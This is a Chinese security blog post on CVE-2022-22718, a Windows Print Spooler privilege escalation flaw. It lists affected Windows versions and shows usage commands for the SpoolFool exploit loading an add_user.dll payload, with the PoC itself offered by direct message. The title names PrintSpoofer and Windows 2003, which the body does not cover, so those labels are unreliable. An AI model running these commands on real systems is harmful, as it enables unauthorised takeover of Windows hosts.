printspoofer提权(win2003提权)

影响范围

  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

  • Windows Server 2008 for x64-based Systems Service Pack 2

  • Windows 7 for 32-bit Systems Service Pack 1

  • Windows Server 2016 (Server Core installation)

  • Windows Server 2016

  • Windows 10 Version 1607 for x64-based Systems

  • Windows 10 Version 1607 for 32-bit Systems

  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

  • Windows Server 2008 for 32-bit Systems Service Pack 2

  • Windows RT 8.1

  • Windows 8.1 for x64-based systems

  • Windows 8.1 for 32-bit systems

  • Windows 7 for x64-based Systems Service Pack 1

  • Windows 10 for x64-based Systems

  • Windows 10 for 32-bit Systems

  • Windows 10 Version 21H2 for x64-based Systems

  • Windows 10 Version 21H1 for x64-based Systems

  • Windows 10 Version 1909 for ARM64-based Systems

  • Windows 10 Version 1909 for x64-based Systems

  • Windows 10 Version 1909 for 32-bit Systems

  • Windows Server 2012 R2 (Server Core installation)

  • Windows Server 2012 R2

  • Windows Server 2012 (Server Core installation)

  • Windows Server 2012

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1

  • Windows 10 Version 21H2 for ARM64-based Systems

  • Windows 10 Version 21H2 for 32-bit Systems

  • Windows 11 for ARM64-based Systems

  • Windows 11 for x64-based Systems

  • Windows Server, version 20H2 (Server Core Installation)

  • Windows 10 Version 20H2 for ARM64-based Systems

  • Windows 10 Version 20H2 for 32-bit Systems

  • Windows 10 Version 20H2 for x64-based Systems

  • Windows Server 2022 Azure Edition Core Hotpatch

  • Windows Server 2022 (Server Core installation)

  • Windows Server 2022

  • Windows 10 Version 21H1 for 32-bit Systems

  • Windows 10 Version 21H1 for ARM64-based Systems

  • Windows Server 2019 (Server Core installation)

  • Windows Server 2019

  • Windows 10 Version 1809 for ARM64-based Systems

  • Windows 10 Version 1809 for x64-based Systems

  • Windows 10 Version 1809 for 32-bit Systems

漏洞类型

本地权限提升

利用条件

影响范围应用

漏洞概述

2022年02月09日,微软发布了安全更新,修复了48个安全漏洞(不包括22个Microsoft Edge漏洞),其中CVE-2022-22718为Windows后台打印程序特权提升漏洞,CVSS评分7.7

漏洞复现

使用说明:

PS C:\\\\SpoolFool> .\\\\SpoolFool.exe
SpoolFool By Oliver Lyak (@ly4k_)
Examples: C:\\\\SpoolFool\\\\SpoolFool.exe -dll add_user.dll C:\\\\SpoolFool\\\\SpoolFool.exe -dll add_user.dll -printer \\\'My Printer\\\' C:\\\\SpoolFool\\\\SpoolFool.exe -dll add_user.dll -dir \\\'SECRET\\\' C:\\\\SpoolFool\\\\SpoolFool.exe -dll add_user.dll -printer \\\'My Printer\\\' -dir \\\'SECRET\\\'

powershell:

PS C:\\\\SpoolFool> ipmo .\\\\SpoolFool.ps1PS C:\\\\SpoolFool> Invoke-SpoolFool
SpoolFool By Oliver Lyak (@ly4k_)
Examples: -dll add_user.dll -dll add_user.dll -printer \\\'My Printer\\\' -dll add_user.dll -dir \\\'SECRET\\\' -dll add_user.dll -printer \\\'My Printer\\\' -dir \\\'SECRET\\\'

安全建议

升级到最新版本~

后台回复\\”Print Spooler\\”,获取POC
后台回复\\”Print Spooler\\”,获取POC
后台回复\\”Print Spooler\\”,获取POC

原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34182.html

(0)
七芒星实验室's avatar七芒星实验室
上一篇 2024年4月15日 下午7:57
下一篇 2024年4月15日 下午7:59

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注